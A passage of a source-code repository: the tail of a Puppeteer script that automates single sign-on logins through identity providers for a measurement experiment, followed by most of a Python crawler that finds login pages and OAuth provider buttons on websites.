Open_Pages[tabindex_IDP].waitForTimeout(5000); 547 | //click button 548 | try{ 549 | await Promise.all([asd= Click_Button(Open_Pages[tabindex_IDP],IDP_Info["Submit"]["Button-Type"],IDP_Info["Submit"]["Button"],"Submit"), 550 | Open_Pages[tabindex_IDP].waitForNavigation({ waitUntil: 'load'})]); 551 | }catch(error){ 552 | console.log("new windows case:login click do not change page check Login selector!!"); 553 | } 554 | 555 | await Open_Pages[tabindex_IDP].waitForTimeout(5000); 556 | //wait for confirmation login 557 | //await Open_Pages[tabindex_IDP].waitForTimeout(100000); 558 | //grant wait for network idle since some IDP skip this step so no navigation happening 559 | try{ 560 | await Promise.all([asd=Click_Button(Open_Pages[tabindex_IDP],IDP_Info["Grant"]["Button-Type"],IDP_Info["Grant"]["Button"],"Grant"), 561 | Open_Pages[tabindex_IDP].waitForNetworkIdle({waitUntil: 'networkidle2'})]); 562 | }catch(error){ 563 | console.log("new windows case:potential error in the grant step chek if redirected to initial site and verify login"); 564 | } 565 | //Check if extra step in dict or just do it based on idp name 566 | if("ExtraStep" in IDP_Info){ 567 | await Exception(Open_Pages[tabindex_IDP],IDP_Info["ExtraStep"]["instructions"],"extra-step"); 568 | } 569 | } 570 | }catch(ex){ 571 | console.log("error in Step4 continue?"); 572 | console.log(ex); 573 | } 574 | 575 | } 576 | else {//Step4alt: no new window check url if IDP domain or found form username and then perform the login in the same tab 577 | console.log("Step4alt: check url and do login in the same tab"); 578 | await page.waitForTimeout(3000); 579 | var check_url=page.url(); 580 | var domaincheck = TLDJS.parse(check_url).domain; 581 | 582 | if(check_url===initial_url){ 583 | console.log("no new window and same initial url login trigger not working"); 584 | await browser.close(); 585 | console.log("unable to trigger IDP login ABORT-EXPERIMENT:YES"); 586 | process.exit(1); 587 | } 588 | else{ 589 | console.log("check IDP:%s and domaincheck:%s",IDP,domaincheck); 590 | //idp domain or found unername form 591 | selector=await ObtainSelector(IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"]); 592 | console.log("obtained this selector: %s",selector); 593 | try{ 594 | test=await page.waitForSelector(selector,{timeout:10000}); 595 | }catch(ex){ 596 | if(ex.message.includes("failed")){ 597 | console.log("not found username form in tab!"); 598 | test=null; 599 | } 600 | } 601 | console.log("result of the selector search:%s",test); 602 | 603 | if( IDP===domaincheck || !(test===null) ){ 604 | //redirected to IDP page for login 605 | 606 | //fill forms 607 | var asd=await Fillform(page,IDP_Info["Fill"]["User-Type"],IDP_Info["Fill"]["Form-User"],IDP_Info["Username"]); 608 | console.log("same page result first fill form: %s",asd); 609 | if(asd===false){ 610 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 611 | await browser.close(); 612 | process.exit(1); 613 | } 614 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 615 | await Exception(page,asd,"login"); 616 | } 617 | await page.waitForTimeout(3000); 618 | asd= await Fillform(page,IDP_Info["Fill"]["Pass-Type"],IDP_Info["Fill"]["Form-Pass"],IDP_Info["Password"]); 619 | console.log("same page result second fill form: %s",asd); 620 | if(asd===false){ 621 | console.log("fill form unsucessful stop ABORT-EXPERIMENT:YES"); 622 | await browser.close(); 623 | process.exit(1); 624 | } 625 | else if(asd.length!=undefined && !(asd.includes("No node found for selector"))){ 626 | await Exception(page,asd,"login"); 627 | } 628 | await page.waitForTimeout(5000); 629 | 630 | //click button 631 | try{ 632 | await Promise.all([asd=Click_Button(page,IDP_Info["Submit"]["Button-Type"],IDP_Info["Submit"]["Button"],"Submit"), 633 | page.waitForNavigation({ waitUntil: 'load'})]); 634 | }catch(error){ 635 | console.log("same windows case:login click do not change page check Login selector!!"); 636 | } 637 | await page.waitForTimeout(5000); 638 | //wait for confirmation login 639 | //await page.waitForTimeout(100000); 640 | //grant wait for network idle since some IDP skip this step so no navigation happening 641 | try{ 642 | await Promise.all([asd= await Click_Button(page,IDP_Info["Grant"]["Button-Type"],IDP_Info["Grant"]["Button"],"Grant"), 643 | page.waitForNetworkIdle({waitUntil: 'networkidle2'})]); 644 | }catch(error){ 645 | console.log("same windows case:potential error in the grant step chek if redirected to initial site and verify login"); 646 | } 647 | //Check if extra step in dict or just do it based on idp name 648 | if("ExtraStep" in IDP_Info){ 649 | await Exception(page,IDP_Info["ExtraStep"]["instructions"],"extra-step"); 650 | } 651 | } 652 | else{ 653 | console.log("no new window and no redirection to IDP domain but changed url error in xpath!!"); 654 | console.log("initial url:%s \n checkurl:%s",initial_url,check_url); 655 | //search for error in url or page 656 | await browser.close(); 657 | console.log("error in dompath or other ABORT-EXPERIMENT:YES"); 658 | process.exit(1); 659 | } 660 | } 661 | } 662 | 663 | //Step5:identify succesfull login:take a screenshot after login,inspect url page,search identifiers 664 | console.log("Step5:check if succesful login"); 665 | //gives time to redirect and then wait for page to be ready 666 | await page.waitForTimeout(10000); 667 | await page.screenshot({path: OutputPath+OutputName+"_AfterSSOLogin.png" ,fullPage: true}); 668 | var checktab= await browser.pages(); 669 | let opentabs2 = checktab.length; 670 | console.log("number of open tabs after SSOLogin:%s",opentabs2); 671 | 672 | if(newwindow){ 673 | if(opentabs2>2){//open new tab still open check if IDP domain and if initial page with same url 674 | console.log("more than 3 tabs open at the end of the measurement"); 675 | try{ 676 | var nw_closecode = await AnalizeResult_New_Window(browser,IDP,page,Open_Pages[tabindex_IDP],domainbegin,initial_url,measurement); 677 | }catch(ex){ 678 | console.log("error in the final evaluation new windows:%s",ex.message); 679 | 680 | } 681 | await browser.close(); 682 | process.exit(nw_closecode); 683 | } 684 | console.log("used new window for login but closed it"); 685 | } 686 | 687 | let return_url=page.url(); 688 | var domainreturn = TLDJS.parse(return_url).domain; 689 | var html=await page.content(); 690 | 691 | try{ 692 | var closecode = await AnalizeResult(browser,IDP,domainbegin,initial_url,domainreturn,return_url,html,measurement); 693 | } 694 | catch(ex){ 695 | console.log("error in the final evaluation:%s",ex.message); 696 | } 697 | //close the browser and use return as exit code 698 | await browser.close(); 699 | process.exit(closecode); 700 | })(); 701 | -------------------------------------------------------------------------------- /idps-identification.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | __author__ = "Matteo Golinelli" 4 | __copyright__ = "Copyright (C) 2023 Matteo Golinelli" 5 | __license__ = "MIT" 6 | 7 | from requests.exceptions import SSLError, ConnectionError, ReadTimeout 8 | from urllib3.exceptions import NewConnectionError, MaxRetryError, ReadTimeoutError 9 | from urllib.parse import urlparse, urlunparse, urljoin, urldefrag 10 | from selenium import webdriver 11 | from bs4 import BeautifulSoup 12 | 13 | import traceback 14 | import argparse 15 | import requests 16 | import logging 17 | import random 18 | import string 19 | import json 20 | import time 21 | import sys 22 | import os 23 | import re 24 | 25 | # ============================================================================= 26 | # ============================================================================= 27 | # ================================= FUNCTIONS ================================= 28 | # ============================================================================= 29 | # ============================================================================= 30 | 31 | # ============================================================================= 32 | # ========================= Basic crawling functions ========================== 33 | # ============================================================================= 34 | 35 | def get_template_url(url, _path=True): 36 | """ 37 | Returns the template of the passed URL. The template contains: 38 | - the netloc (domain) 39 | - the path (if path=True) 40 | Everything else is removed. 41 | """ 42 | try: 43 | parsed = urlparse(urldefrag(url)[0]) 44 | if _path: 45 | return urlunparse(('', parsed.netloc, parsed.path, '', '', '')) 46 | else: 47 | if len(parsed.path.split('/')) > 1: 48 | path = parsed.path.replace(parsed.path.split('/')[-1], '') 49 | else: 50 | path = parsed.path 51 | return urlunparse(('', parsed.netloc, re.sub('\d+', '', path), '', '', '')) 52 | except: 53 | logger.debug(traceback.format_exc()) 54 | return None 55 | 56 | def get_domain_name(url): 57 | """ 58 | Returns the domain name of the passed URL 59 | (Ignore top level domain and subdomains). 60 | """ 61 | try: 62 | if url.startswith('http') and '//' in url: 63 | parsed = urlparse(urldefrag(url)[0]) 64 | split_netloc = parsed.netloc.replace('www.', '').split('.') 65 | else: 66 | split_netloc = url.split('.') 67 | if len(split_netloc) > 2: 68 | if len(split_netloc[-2]) >= 3: 69 | return split_netloc[-2] 70 | else: 71 | return split_netloc[-3] 72 | elif len(split_netloc) == 2: 73 | return split_netloc[-2] 74 | else: 75 | return '' 76 | except: 77 | logger.debug(url, split_netloc) 78 | logger.debug(traceback.format_exc()) 79 | return None 80 | 81 | def get_domain(url): 82 | """ 83 | Returns the domain name of the passed URL. 84 | """ 85 | return urlparse(url).netloc 86 | 87 | def is_internal_url(url): 88 | """ 89 | Returns True if the url is internal to the website. 90 | Ignores the top level domain: 91 | e.g., google.com and google.it are considered the same domain. 92 | """ 93 | try: 94 | if not url.startswith('http'): 95 | url = 'http://' + url 96 | parsed = urlparse(url) 97 | if get_domain_name(parsed.netloc).endswith(get_domain_name(SITE)): 98 | return True 99 | else: 100 | return False 101 | except: 102 | logger.error(traceback.format_exc()) 103 | return False 104 | 105 | def get_links(page_url, html, only_internal=True): 106 | """ 107 | Receives a URL and the body of the web page 108 | and returns a set of all links found in the page 109 | if only_internal is True, only internal links are returned. 110 | """ 111 | links = [] 112 | 113 | try: 114 | soup = BeautifulSoup(html, 'html.parser') 115 | 116 | for link in soup.find_all('a', href=True): 117 | url = urljoin(clean_url(page_url), clean_url(link['href'])) 118 | 119 | if 'http' in url and only_internal and is_internal_url(url): 120 | links.append(clean_url(urldefrag(url)[0])) 121 | 122 | elif not only_internal: 123 | _url = clean_url(urldefrag(url)[0]) 124 | if any([i in _url for i in DENYLISTED_DOMAINS]): 125 | continue 126 | 127 | links.append(_url) 128 | except: 129 | logger.debug(traceback.format_exc()) 130 | 131 | return sorted(links) 132 | 133 | def get_source_code_links(url, html): 134 | """ 135 | Returns a list of all links found in the 136 | source code of the passed page. 137 | """ 138 | 139 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 140 | links = [] 141 | 142 | # Find links in the source code using regular expressions 143 | regex_links = re.findall("((?:https?:\/\/|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}\/)(?:[^\s()<>\"\']+|\(([^\s()<>\"\']+|(\([^\s()<>\"\']+\)))*\))+(?:\(([^\s()<>\"\']+|(\([^\s()<>\"\']+\)))*\)|[^\s`!()\[\]{};:'\".,<>?]))", html) 144 | links = [''.join(link) for link in regex_links if not any([i in link for i in DENYLISTED_DOMAINS])] 145 | 146 | soup = BeautifulSoup(html, 'html.parser') 147 | # and in tags that have an href 148 | for link in soup.find_all(href=True): 149 | href = link['href'] 150 | links.append(urljoin(url, href)) 151 | # and in forms actions 152 | forms = soup.find_all('form') 153 | for form in forms: 154 | try: 155 | action = form.get('action') 156 | if action != None: 157 | links.append(urljoin(url, action)) 158 | except: 159 | pass 160 | 161 | # and in buttons (action, href, data-url, data-href, ecc) 162 | buttons = soup.find_all('button') 163 | for button in buttons: 164 | try: 165 | action = urljoin(url, button.get('action')) 166 | if action != None: 167 | links.append(action) 168 | except: 169 | pass 170 | 171 | for button in buttons: 172 | try: 173 | data_url = button.get('data-url') 174 | if data_url != None: 175 | links.append(urljoin(url, data_url)) 176 | data_href = button.get('data-href') 177 | if data_href != None: 178 | links.append(urljoin(url, data_href)) 179 | formaction = button.get('formaction') 180 | if formaction != None: 181 | links.append(urljoin(url, formaction)) 182 | except: 183 | pass 184 | 185 | return links 186 | 187 | def add_to_queue(url, exclude_denylisted=True): 188 | """ 189 | Add a url to the queue if it is not already in the queue 190 | and if its template is not already in the visited list. 191 | """ 192 | try: 193 | if exclude_denylisted and any([i in url for i in DENYLISTED_PATTERNS]): 194 | return 195 | domain = get_domain(url) 196 | 197 | if not is_visited(url): 198 | if domain not in queue: 199 | queue[domain] = [] 200 | if url not in queue[domain]: 201 | queue[domain].append(url) 202 | except: 203 | if DEBUG: 204 | logger.error(traceback.format_exc()) 205 | 206 | def add_to_visited(url): 207 | """ 208 | Add a url to the visited list. 209 | """ 210 | try: 211 | if not is_visited(url): 212 | domain = get_domain(url) 213 | if domain not in visited_urls: 214 | visited_urls[domain] = [] 215 | 216 | template_url = get_template_url(url) 217 | visited_urls[domain].append(template_url) 218 | 219 | except: 220 | if DEBUG: 221 | logger.error(traceback.format_exc()) 222 | 223 | def is_visited(url): 224 | """ 225 | Return True if the template of the url 226 | is in the visited list. 227 | """ 228 | try: 229 | domain = get_domain(url) 230 | if not domain in visited_urls: 231 | return False 232 | 233 | template_url = get_template_url(url) 234 | if template_url is not None and \ 235 | template_url in visited_urls[domain]: 236 | return True 237 | else: 238 | return False 239 | except: 240 | if DEBUG: 241 | logger.error(traceback.format_exc()) 242 | return False 243 | 244 | def get_url_from_queue(visited=False): 245 | """ 246 | Return the first not visited url in the queue 247 | if the visited list for this domain is not full. 248 | """ 249 | domains = list(queue.keys()) 250 | random.shuffle(domains) 251 | 252 | try: 253 | for domain in domains: 254 | # If the visited list for this domain 255 | # is full, choose a new domain 256 | if domain in visited_urls and \ 257 | len(visited_urls[domain]) >= MAX: 258 | continue 259 | else: 260 | # Pop the first url in the queue 261 | # for this domain 262 | while len(queue[domain]) > 0: 263 | url = queue[domain].pop(0) 264 | if not is_visited(url): 265 | if visited: 266 | add_to_visited(url) 267 | return url 268 | except: 269 | if DEBUG: 270 | logger.error(traceback.format_exc()) 271 | return None 272 | 273 | def should_continue(): 274 | """ 275 | Return True if the queue is not empty 276 | and the visited list is not full. 277 | """ 278 | try: 279 | for domain in queue: 280 | if domain not in visited_urls or \ 281 | (len(visited_urls[domain]) < MAX and \ 282 | len(queue[domain]) > 0): 283 | return True 284 | except: 285 | if DEBUG: 286 | logger.error(traceback.format_exc()) 287 | return False 288 | 289 | # ============================================================================= 290 | # ====================== Login detection functions ============================ 291 | # ============================================================================= 292 | 293 | def get_login_url(urls): 294 | """ 295 | Return the login url from the list of urls (if present). 296 | """ 297 | for url in urls: 298 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 299 | # logger.info(f'{bcolors.OKGREEN}[+]{bcolors.ENDC} {url}') 300 | 301 | denylist = ['/hc/', 'facebook', 'google'] 302 | 303 | if '/signin' in cleaned_url or \ 304 | '/login' in cleaned_url and \ 305 | '/join' in cleaned_url and \ 306 | not any(i in cleaned_url for i in denylist): 307 | # logger.info(f'Login url found: {bcolors.OKGREEN}{url}{bcolors.ENDC} because contains /login or /signin') 308 | return url 309 | 310 | for url in urls: 311 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 312 | 313 | if 'signin' in cleaned_url or \ 314 | 'login' in cleaned_url and \ 315 | not any(i in cleaned_url for i in denylist): 316 | # logger.info(f'Login url found: {bcolors.OKGREEN}{url}{bcolors.ENDC} because contains login or signin') 317 | return url 318 | return '' 319 | 320 | def is_login_page(url, html): 321 | """ 322 | Return True if the current page is a login PAGE. 323 | """ 324 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 325 | 326 | if 'login' in cleaned_url or \ 327 | 'signin' in cleaned_url: 328 | return True 329 | 330 | soup = BeautifulSoup(html, 'html.parser') 331 | password = soup.find('input', {'type' : 'password'}) 332 | if password is not None: 333 | return True 334 | return False 335 | 336 | def get_oauth_link(urls, provider): 337 | """ 338 | Return provider's OAuth link 339 | from a list of URLs 340 | """ 341 | for url in urls: 342 | cleaned_url = url.replace('_', '').replace('-', '').replace('.', '').lower() 343 | denylist = [ 344 | 'itunes.apple', 'play.google', 'googleapis', 'googleads', 'doubleclick', 'googletagmanager.com', 'apis.google.com', '/hc/', 'assets', '.gif', '.jpeg', '.jpg', '.png', '.css', '.js', 345 | '/gsi/style', '/gsi/client', 'captcha', 'designing' 346 | ] 347 | 348 | denylisted_extensions = ['.gif', '.jpeg', '.jpg', '.png', '.css', '.js', '.svg', '.woff', '.woff2', '.ttf', '.eot', '.otf', '.ico', '.xml', '.json', '.txt'] 349 | parsed = urlparse(cleaned_url) 350 | if parsed.path.endswith(tuple(denylisted_extensions)): 351 | return '' 352 | 353 | # Expand denylist for specific providers 354 | denylist = extend_denylist(provider, denylist) 355 | 356 | if provider in cleaned_url and \ 357 | not any(x in url for x in denylist) and \ 358 | ( 'auth' in cleaned_url or \ 359 | 'login' in cleaned_url or\ 360 | 'account' in cleaned_url or\ 361 | 'signin' in cleaned_url ): 362 | return url 363 | return '' 364 | 365 | def is_oauth_tag(tag, provider): 366 | """ 367 | Return True if the tag is an OAuth login button 368 | """ 369 | # Limit length 370 | if len(str(tag)) > 5000: 371 | return False 372 | 373 | combined = '' 374 | 375 | if type(tag.text) == str: 376 | combined += ';' + tag.text.strip().replace('\n', '') 377 | elif type(tag.text) == list: 378 | # ??? 379 | logger.info(type(tag.text)) 380 | logger.info(str(tag)) 381 | for value in tag.attrs.values(): 382 | if type(value) == str: 383 | combined += ';' + value.strip() 384 | elif type(value) == list: 385 | combined += ';' + '_'.join([x.strip() for x in value]) 386 | else: 387 | #logger.info(type(value)) 388 | #logger.info(str(tag)) 389 | pass 390 | 391 | denylist = [ 392 | 'itunesapple', 'playgoogle', 'googleapis', 'googleads', 'doubleclick', 'googletagmanagercom', 'apisgooglecom', 393 | 'captcha', 'designing'] 394 | # Expand denylist for specific providers 395 | denylist = extend_denylist(provider, denylist) 396 | 397 | combined = combined.lower().replace('\n', '').replace('-', '').replace('.', '').replace('_', '').strip() 398 | while ' ' in combined: 399 | combined = combined.replace(' ', ' ') 400 | 401 | if ( 402 | provider in combined and 403 | not any(x.replace('.', '') in combined for x in denylist) and 404 | any(x in combined for x in OAUTH_KEYWORDS)): 405 | return True 406 | 407 | def get_oauth_tag(html, provider, all_tags=True): 408 | """ 409 | Return the XPath to the OAuth login button 410 | """ 411 | provider = provider.lower().strip() 412 | soup = BeautifulSoup(html, 'html.parser') 413 | 414 | # Begin with the most specific tags 415 | for tag in soup.find_all(["a", "input", "button"]): 416 | if is_oauth_tag(tag, provider): 417 | xpath = get_xpath(soup, tag) 418 | return str(tag), xpath 419 | 420 | if not all_tags: 421 | return None, None 422 | 423 | # Note: searching in less specific tags might increase the number of false positives 424 | for tag in soup.find_all(): 425 | if tag.name in ["a", "input", "button", "script"]: 426 | continue 427 | if is_oauth_tag(tag, provider): 428 | xpath = get_xpath(soup, tag) 429 | return str(tag), xpath 430 | 431 | return None, None 432 | 433 | # ============================================================================= 434 | # ============================= Helper functions ============================== 435 | # ============================================================================= 436 | 437 | def get_random_string(start=10, end=20): 438 | return ''.join(random.choice(string.ascii_letters + string.digits + '_') for _ in range(random.randint(start, end))) 439 | 440 | def clean_url(url): 441 | """ 442 | Cleans the url to remove any trailing newlines and spaces. 443 | """ 444 | return url.strip().strip('\n') 445 | 446 | def url_to_filename(url): 447 | """ 448 | Converts a URL to a filename. 449 | """ 450 | template_url = get_template_url(url).split('.')[0] # Also remove the extension 451 | name = '' 452 | for c in template_url: 453 | if c in string.ascii_letters + string.digits: 454 | name += c 455 | return name 456 | 457 | def extend_denylist(provider, denylist): 458 | ''' 459 | Extend the denylist with specific 460 | patterns for the current provider. 461 | ''' 462 | if provider == 'ok': 463 | denylist.extend(['facebook', 'token', 'cookie', 'Token']) 464 | # OK has a lot of false positives, so we also add all the other providers 465 | denylist.extend([provider.lower() for provider in PROVIDERS if provider.lower() != 'ok']) 466 | if provider == 'line': 467 | denylist.extend(['inline', 'streamline', 'guideline', 'offline', 'outline', 'online', 'underline', 'timeline', 'line-height', 'line-width']) 468 | if provider == 'google': 469 | denylist.extend(['playgooglecom', 'analytics', '/gsi/style']) 470 | if provider == 'amazon': 471 | denylist.extend(['amazonawscom']) 472 | if provider == 'stackoverflow': 473 | denylist.extend(['/question/']) 474 | if provider == 'facebook': 475 | denylist.extend(['sharerphp']) 476 | if provider == 'linkedin': 477 | denylist.extend(['share']) 478 | if provider == 'microsoft': 479 | denylist.extend(['jsdisabled']) 480 | if provider == 'reddit': 481 | denylist.extend(['submit']) 482 | if provider == 'yahoo': 483 | denylist.extend(['analytics']) 484 | if provider == 'twitter': 485 | denylist.extend(['intent']) 486 | 487 | return denylist 488 | 489 | def remove_query_string(url): 490 | """ 491 | Removes the query string from the url. 492 | """ 493 | return url.split('?')[0] 494 | 495 | def save_dictionaries(site, logs_dir): 496 | """ 497 | Save the dictionaries to the files. 498 | """ 499 | global urls, queue, visited_urls 500 | 501 | logs = { 502 | 'queue': queue, 503 | 'visited': visited_urls 504 | } 505 | if not os.path.exists(logs_dir): 506 | os.makedirs(logs_dir) 507 | with open(f'{logs_dir}/{site}-log.json', 'w') as f: 508 | json.dump(logs, f, indent=4) 509 | logger.info(f'Saved logs to {logs_dir}/{site}-log.json') 510 | 511 | if not os.path.exists('links/'): 512 | os.makedirs('links/') 513 | with open(f'links/{site}-links.json', 'w') as f: 514 | json.dump(urls, f, indent=4) 515 | logger.info(f'Saved links to links/{site}-links.json') 516 | 517 | def get_dictionaries(): 518 | """ 519 | Load the dictionaries from the files. 520 | """ 521 | global urls, queue, visited_urls 522 | 523 | if os.path.exists(f'{LOGS}/{SITE}-log.json'): 524 | with open(f'{LOGS}/{SITE}-log.json', 'r') as f: 525 | logs = json.load(f) 526 | queue = logs['queue'] 527 | visited_urls = logs['visited'] 528 | if os.path.exists(f'links/{SITE}-links.json'): 529 | with open(f'links/{SITE}-links.json', 'r') as f: 530 | urls = json.load(f) 531 | 532 | # XPath generation 533 | def get_xpath(soup, tag): 534 | """ 535 | Generates the XPath to the tag. 536 | """ 537 | 538 | # Prioritize the tag's id 539 | _id = tag.get('id') 540 | if _id: 541 | if type(_id) == list: 542 | return f'//{tag.name}[@id="{" ".join(_id)}"]' 543 | else: 544 | return f'//{tag.name}[@id="{_id}"]' 545 | 546 | # Then the tag's class (only if unique throuout the page) 547 | _class = tag.get('class') 548 | if len(soup.find_all(tag.name, class_=_class)) == 1: 549 | if type(_class) == list: 550 | return f'//{tag.name}[@class="{" ".join(_class)}"]' 551 | else: 552 | return f'//{tag.name}[@class="{_class}"]' 553 | 554 | # Then the ids of the tag's children 555 | for child in tag.findChildren(): 556 | _id = child.get('id') 557 | if _id: 558 | if type(_id) == list: 559 | return f'//{child.name}[@id="{" ".join(_id)}"]' 560 | else: 561 | return f'//{child.name}[@id="{_id}"]' 562 | 563 | # Then the classes of the tag's children (only if unique throuout the page) 564 | for child in tag.findChildren(): 565 | _class = child.get('class') 566 | if _class: 567 | if len(soup.find_all(child.name, class_=_class)) == 1: 568 | if type(_class) == list: 569 | return f'//{child.name}[@class="{" ".join(_class)}"]' 570 | else: 571 | return f'//{child.name}[@class="{_class}"]' 572 | 573 | # If nothing worked, resort to the tag's text 574 | text = tag.text.strip().replace('\n', '') 575 | if text != '': 576 | return f'//{tag.name}/*[contains(text(), "{text}")]' 577 | return None 578 | 579 | # ============================================================================= 580 | # ============================================================================= 581 | # ============================== GLOBAL VARIABLES ============================= 582 | # ============================================================================= 583 | # ============================================================================= 584 | 585 | class bcolors: 586 | HEADER = '\033[95m' 587 | OKBLUE = '\033[94m' 588 | OKCYAN = '\033[96m' 589 | OKGREEN = '\033[92m' 590 | WARNING = '\033[93m' 591 | FAIL = '\033[91m' 592 | ENDC = '\033[0m' 593 | BOLD = '\033[1m' 594 | UNDERLINE = '\033[4m' 595 | 596 | # Dictionaries where the key is the domain and the value is a list of URLs 597 | queue = {} 598 | visited_urls = {} 599 | 600 | # Information dictionary 601 | urls = { 602 | 'site': '', 603 | 'homepage': '', 604 | 'login': {}, # Login pages URLs: {'idp': {...}} 605 | 'idps': [] 606 | } 607 | 608 | # Session: python requests browser 609 | session = requests.Session() 610 | 611 | # Logger 612 | logging.basicConfig() 613 | logger = logging.getLogger('idps-identification') 614 | 615 | # CONSTANTS 616 | PROVIDERS = [ 617 | 'google', 'facebook', 'twitter', 'linkedin', 'github', 618 | 'slack', 'microsoft', 'vk', 'vkontakte', 'apple', 619 | 'amazon', 'kakao', 'yahoo', 'naver', 620 | 'line', 'mailru', 'nintendo', 'paypal', 'reddit', 621 | 'bitbucket', 'stackoverflow', 'instagram', 'odnoklassniki', 622 | 'twitch', 'yandex', 'steam', 'pinterest', 'rambler', 623 | 'weibo', 'sina', 'envato', 'soundcloud', 'tumblr', 624 | 'dropbox', 'spotify', 'stackexchange', 'alipay', 625 | 'aliexpress', 'clever', 'docomo', 'ok'] 626 | 627 | OAUTH_KEYWORDS = [ 628 | 'auth', 'login', 'account', 'signin', 629 | 'signon', 'register', 'continue', 630 | 'authentication', 'dialog' 631 | ] 632 | 633 | DEBUG = True 634 | SITE = '' 635 | MAX = 10 636 | 637 | USER_AGENT = f'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0' 638 | 639 | # Regex to avoid requesting URLs that might cause a logout 640 | LOGOUT_DENYLIST_REGEX = re.compile( 641 | '(sign|log|opt)[+-_]*(out|off)|leave', 642 | re.IGNORECASE 643 | ) 644 | 645 | DENYLISTED_PATTERNS = [ 646 | '/hc/', 647 | 'https://support.', 'http://support.', 648 | 'https://help.', 'http://help.', 649 | 650 | ] 651 | 652 | DENYLISTED_DOMAINS = [ 653 | 'doubleclick.net', 'googleadservices.com', 654 | 'google-analytics.com', 'googletagmanager.com', 655 | 'googletagservices.com', 'googleapis.com', 656 | 'googlesyndication.com', 'analytics.ticktok.com', 657 | 'gstatic.com' 658 | ] 659 | 660 | # ============================================================================= 661 | # ============================================================================= 662 | # =================================== MAIN ==================================== 663 | # ============================================================================= 664 | # ============================================================================= 665 | 666 | if __name__ == '__main__': 667 | # Arguments parsing 668 | parser = argparse.ArgumentParser( 669 | prog='idps-identification.py', 670 | description='Find supported IdPs in a website\'s login page' 671 | ) 672 | 673 | parser.add_argument('-t', '--target', required=False, help='Target website') 674 | parser.add_argument('-S', '--stats', default='stats', help='Statistics folder') 675 | parser.add_argument('-R', '--reports', default='reports', help='Reports folder') 676 | parser.add_argument('-l', '--logs', default='logs', help='Logs folder') 677 | parser.add_argument('-L', '--links', help='File containing the login links') 678 | parser.add_argument('-m', '--max', default=MAX, help=f'Maximum number of URLs to crawl (Default: {MAX})') 679 | parser.add_argument('-N', '--no-headless', help='Do not use a headless browser', action='store_true') 680 | parser.add_argument('-r', '--retest', help='Retest the URLs', action='store_true') 681 | parser.add_argument('-d', '--debug', help='Enable debug mode', action='store_true') 682 | 683 | args = parser.parse_args() 684 | 685 | logger.setLevel(logging.INFO) 686 | if args.debug: 687 | logger.setLevel(logging.DEBUG) 688 | 689 | SITE = ( 690 | args.target 691 | .strip() 692 | .lower() 693 | .replace('http://', '') 694 | .replace('https://', '') 695 | ) 696 | LOGS = args.logs 697 | STATS = args.stats 698 | REPORTS = args.reports 699 | MAX = int(args.max) 700 | HEADLESS = not args.no_headless 701 | 702 | # Create the folders if they do not exist 703 | if not os.path.exists(LOGS): 704 | os.makedirs(LOGS) 705 | if not os.path.exists(STATS): 706 | os.makedirs(STATS) 707 | if not os.path.exists(REPORTS): 708 | os.makedirs(REPORTS) 709 | if not os.path.exists('html'): 710 | os.makedirs('html') 711 | 712 | urls['site'] = SITE 713 | 714 | try: 715 | # Get dictionaries from the files 716 | if not args.retest: 717 | get_dictionaries() 718 | 719 | # Set the options for the browser 720 | browser = None 721 | 722 | options = webdriver.ChromeOptions() 723 | options.add_argument(f'user-agent={USER_AGENT}') 724 | 725 | options.set_capability('goog:loggingPrefs', {'performance': 'ALL'}) 726 | 727 | if HEADLESS: 728 | options.add_argument('headless') 729 | options.add_argument("--disable-gpu") 730 | 731 | # Check if the site is already crawled 732 | if urls['homepage'] == '': 733 | logger.info(f'Crawling the site to collect the URLs to test') 734 | 735 | # Visit the homepage and follow redirects 736 | if urls['homepage'] == '': 737 | logger.info('Searching for the homepage') 738 | 739 | response = session.get(f'https://{SITE}/', timeout=30) 740 | url = response.url 741 | add_to_visited(url) 742 | 743 | homepage = url 744 | urls['homepage'] = homepage 745 | logger.info(f'found: {homepage}') 746 | elif urls['homepage'] != '': 747 | homepage = urls['homepage'] 748 | 749 | if len(urls['login']) == 0: 750 | # Note: remove this to search for more login pages when re-running the script 751 | logger.info('Searching for the login page') 752 | if browser is None: 753 | browser = webdriver.Chrome(options=options) 754 | 755 | # Clean the queue and visited_urls dictionaries 756 | queue = {} 757 | visited_urls = {} 758 | 759 | browser.get(urls['homepage']) 760 | time.sleep(1) 761 | 762 | # with open(f'html/{SITE}-homepage.html', 'w') as f: 763 | # f.write(browser.page_source) 764 | 765 | # Get links from the homepage 766 | links = get_links(browser.current_url, browser.page_source, only_internal=True) 767 | 768 | login_url = get_login_url(links) 769 | if any(provider in login_url for provider in PROVIDERS): 770 | login_url = remove_query_string(login_url) 771 | if login_url != '': 772 | if not any(get_template_url(login_url) == get_template_url(_url) for _url in urls['login']): 773 | urls['login'][login_url] = {} 774 | logger.info(f'found (1): {login_url}') 775 | 776 | for _url in links: 777 | add_to_queue(_url) 778 | 779 | # Check if contains login functionalities 780 | if is_login_page(browser.current_url, browser.page_source): 781 | if not any(get_template_url(login_url) == get_template_url(_url) for _url in urls['login']): 782 | urls['login'][browser.current_url] = {} 783 | logger.info(f'found (2): {browser.current_url}') 784 | 785 | # Crawl the site to find *login page* 786 | while should_continue() and len(urls['login']) == 0: 787 | url = get_url_from_queue() 788 | 789 | if LOGOUT_DENYLIST_REGEX.search(url): 790 | continue 791 | 792 | browser.get(url) 793 | add_to_visited(url) 794 | 795 | # Get links from the page 796 | links = get_links(browser.current_url, browser.page_source, only_internal=True) 797 | 798 | # TODO: here we should follow the redirects! 799 | login_url = get_login_url(links) 800 | if login_url != '': 801 | if not any(get_template_url(login_url) == get_template_url(_url) for _url in urls['login']): 802 | urls['login'][login_url] = {} 803 | logger.info(f'found (3): {login_url}') 804 | 805 | for _url in links: 806 | add_to_queue(_url) 807 | 808 | # Check if it's the login page 809 | if is_login_page(browser.current_url, browser.page_source): 810 | if not any(get_template_url(login_url) == get_template_url(_url) for _url in urls['login']): 811 | urls['login'][url] = {} 812 | logger.info(f'found (4): {url}') 